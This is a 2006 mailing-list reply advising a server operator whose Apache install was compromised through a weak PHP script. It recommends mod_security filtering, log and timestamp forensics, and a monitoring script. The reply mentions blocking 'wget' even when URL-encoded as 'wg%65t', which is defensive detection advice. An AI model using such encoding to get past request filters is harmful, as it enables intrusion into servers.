On Tue, Mar 07, 2006 at 12:37:42PM +0100, Ismail wrote: > >>Recently I've noticed that my Apache-installation gets violated and that > >>an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it > >>makes Apache execute these. Unfortunately these are some rather nasty > >>things, mostly portscanners and bruteforce-attacks. They are all easily > >>detected with netstat, and at least once a day I have to go in and kill > >>the processes spawned by www-data (the user that runs Apache) as well as > >>delete the offending files. > > > I had a similar encounter about 2 months ago. The intruder exploited a > PHP script that was poorly written. If you check your http access logs, > you will most likely find an entry about the PHP that is been exploited. Sounds familiar, I'd be suspecting php scripts or similar. The first thing I can suggest is mod_security, this is essentially an application level firewall for apache, and lets you block things like 'wget', even if they're encoded as say wg%65t. It supports logging all requests for audit pruposes. As for figuring out what is at fault, one thing to look at is timestamps of the payload, in particular ctime. Then compare against your apache logs and you should be able to get a shortlist of 5-10 seconds worth of requests. POSTs are problematic as their data isn't in the apache logs, but in combination with mod_security you should be able to finger the exact request. Finally, a bit of a plug. I wrote a script to look for processes hanging off apache that have been there for too long e.g. a bot. Code at: http://www.netsoc.tcd.ie/~bbrazil/code/brmon/ (long_running_apache). Brian -- Website: http://www.netsoc.tcd.ie/~bbrazil
Attachment:
signature.asc
Description: Digital signature